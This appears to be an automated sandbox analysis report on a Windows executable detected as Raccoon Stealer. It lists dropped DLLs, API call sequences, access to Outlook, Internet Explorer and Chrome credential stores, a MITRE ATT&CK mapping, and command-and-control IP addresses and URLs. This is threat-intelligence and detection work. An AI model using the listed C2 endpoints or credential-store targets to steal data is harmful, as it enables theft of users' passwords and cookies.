Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\breakpadinjector.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\prldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\IA2Marshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\lgpllibs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleMarshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldif60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\qipcap.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Code function: 0_2_004362A1 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,

Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0043DA90 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0045E752 FindFirstFileExW,

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Code function: 0_2_00434721 __EH_prolog,GetLogicalDriveStringsA,

Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Code function: 0_2_00444F88 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Code function: 0_2_004333DD LoadLibraryA,GetProcAddress,FreeLibrary,

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Code function: 0_2_004322AF __EH_prolog,DeleteFileA,CreateFileA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetFileSize,GetProcessHeap,HeapAlloc,lstrlenA,lstrlenA,lstrcpynA,lstrcpynA,lstrlenA,lstrcpynA,ReadFile,lstrlenA,lstrcpynA,WinHttpSetOption,WinHttpSetOption,WinHttpSetOption,WinHttpConnect,WinHttpConnect,WinHttpOpenRequest,WinHttpOpenRequest,WinHttpSendRequest,WinHttpReceiveResponse,WinHttpQueryDataAvailable,WinHttpReadData,WinHttpCloseHandle,WinHttpCloseHandle,CloseHandle,DeleteFileA,WinHttpCloseHandle,GetProcessHeap,HeapFree,

Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_00458CE3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_00458D58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_00458D27 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_004458F5 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_00444F88 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0043F4A2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0043F605 SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0043F862 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK

Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,StrToIntA,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize,
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Code function: 0_2_0043F2C5 cpuid

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Code function: 0_2_0045084A GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Code function: 0_2_00435C73 __EH_prolog,GetUserNameA,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor,

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Code function: 0_2_00427AAA GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary,

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Stealing of Sensitive Information:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 0.2.4FGVZW19n7.exe.20b0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4FGVZW19n7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.4FGVZW19n7.exe.2140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4FGVZW19n7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4FGVZW19n7.exe.20b0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.4FGVZW19n7.exe.2140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.326178018.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.282477220.0000000002140000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.326412832.00000000020B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4FGVZW19n7.exe PID: 7084, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Show sources

Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Contains functionality to steal Internet Explorer form passwords

Show sources

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 0.2.4FGVZW19n7.exe.20b0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4FGVZW19n7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.4FGVZW19n7.exe.2140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4FGVZW19n7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4FGVZW19n7.exe.20b0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.4FGVZW19n7.exe.2140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.326178018.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.282477220.0000000002140000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.326412832.00000000020B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4FGVZW19n7.exe PID: 7084, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	OS Credential Dumping2	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter2	Boot or Logon Initialization Scripts	Process Injection11	Obfuscated Files or Information3	Credentials In Files1	Account Discovery1	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Software Packing22	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Screen Capture1	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Timestomp1	NTDS	System Information Discovery36	Distributed Component Object Model	Email Collection1	Scheduled Transfer	Application Layer Protocol113	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	File Deletion1	LSA Secrets	Security Software Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading1	Cached Domain Credentials	Virtualization/Sandbox Evasion1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion1	DCSync	Process Discovery11	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection11	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
4FGVZW19n7.exe	51%	Virustotal		Browse
4FGVZW19n7.exe	49%	ReversingLabs	Win32.Trojan.Fragtor
4FGVZW19n7.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleHandler.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleHandler.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleMarshal.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleMarshal.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\qO7qM6fA3\IA2Marshal.dll	3%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\qO7qM6fA3\IA2Marshal.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy_InUse.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy_InUse.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l1-2-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l2-1-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l2-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-handle-l1-1-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-handle-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-heap-l1-1-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-interlocked-l1-1-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-interlocked-l1-1-0.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.4FGVZW19n7.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1139893		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignCA.crl0	0%	URL Reputation	safe
http://194.180.174.40/p	0%	Avira URL Cloud	safe
http://crl.chambersign.org/chambersroot.crl0	0%	URL Reputation	safe
https://repository.luxtrust.lu0	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersroot.html0	0%	URL Reputation	safe
http://www.mozilla.com0	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://crl.securetrust.com/SGCA.crl0	0%	URL Reputation	safe
http://crl.securetrust.com/STCA.crl0	0%	URL Reputation	safe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl	0%	URL Reputation	safe
http://www.certplus.com/CRL/class2.crl0	0%	URL Reputation	safe
http://194.180.174.40/	0%	Virustotal		Browse
http://194.180.174.40/	0%	Avira URL Cloud	safe
http://185.225.19.238/duglassa1	0%	Avira URL Cloud	safe
http://185.163.204.218/duglassa1	0%	Avira URL Cloud	safe
http://94.158.245.137/duglassa1	0%	Avira URL Cloud	safe
http://194.180.174.40/N#9	0%	Avira URL Cloud	safe
https://ocsp.quovadisoffshore.com0	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersignroot.html0	0%	URL Reputation	safe
http://91.219.236.27/duglassa1	0%	Avira URL Cloud	safe
http://policy.camerfirma.com0	0%	URL Reputation	safe
http://ocsp.accv.es0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
https://www.google.c	0%	URL Reputation	safe
https://www.catcert.net/verarrel	0%	URL Reputation	safe
http://94.158.245.167/duglassa1	0%	Avira URL Cloud	safe
http://crl.chambersign.org/chambersignroot.crl0	0%	URL Reputation	safe
http://crl.xrampsecurity.com/XGCA.crl0	0%	URL Reputation	safe
https://www.catcert.net/verarrel05	0%	URL Reputation	safe
http://194.180.174.40//l/f/EqqPhH0B3dP17Spz-q0u/f65289ae65b845a69c17cd35ec8393a2da58e887	0%	Avira URL Cloud	safe
http://www.quovadis.bm0	0%	URL Reputation	safe
http://194.180.174.40//l/f/EqqPhH0B3dP17Spz-q0u/13167c5f54fcce8683665e37815363c28e6e2bbe	0%	Avira URL Cloud	safe
http://www.accv.es00	0%	URL Reputation	safe
http://www.pkioverheid.nl/policies/root-policy-G20	0%	URL Reputation	safe
http://185.163.204.216/duglassa1	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://194.180.174.40/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.225.19.238/duglassa1	true	Avira URL Cloud: safe	unknown
http://185.163.204.218/duglassa1	true	Avira URL Cloud: safe	unknown
http://94.158.245.137/duglassa1	true	Avira URL Cloud: safe	unknown
http://91.219.236.27/duglassa1	true	Avira URL Cloud: safe	unknown
https://t.me/duglassa1	false		high
http://94.158.245.167/duglassa1	true	Avira URL Cloud: safe	unknown
http://194.180.174.40//l/f/EqqPhH0B3dP17Spz-q0u/f65289ae65b845a69c17cd35ec8393a2da58e887	true	Avira URL Cloud: safe	unknown
http://194.180.174.40//l/f/EqqPhH0B3dP17Spz-q0u/13167c5f54fcce8683665e37815363c28e6e2bbe	true	Avira URL Cloud: safe	unknown
http://185.163.204.216/duglassa1	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr	false		high
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://fedir.comsign.co.il/crl/ComSignCA.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://194.180.174.40/p	4FGVZW19n7.exe, 00000000.00000002.326551748.000000004B47B000.00000004.00000010.sdmp, 4FGVZW19n7.exe, 00000000.00000003.324132855.000000004B47B000.00000004.00000010.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr	false		high
http://crl.chambersign.org/chambersroot.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
https://repository.luxtrust.lu0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
https://support.google.com/chrome/answer/6258784	4FGVZW19n7.exe, 00000000.00000003.290465926.000000004B401000.00000004.00000010.sdmp	false		high
http://cps.chambersign.org/cps/chambersroot.html0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.mozilla.com0	ldap60.dll.0.dr	false	URL Reputation: safe	unknown
http://www.chambersign.org1	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_flash	4FGVZW19n7.exe, 00000000.00000003.290465926.000000004B401000.00000004.00000010.sdmp	false		high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.firmaprofesional.com/cps0	nssckbi.dll.0.dr	false		high
http://www.diginotar.nl/cps/pkioverheid0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
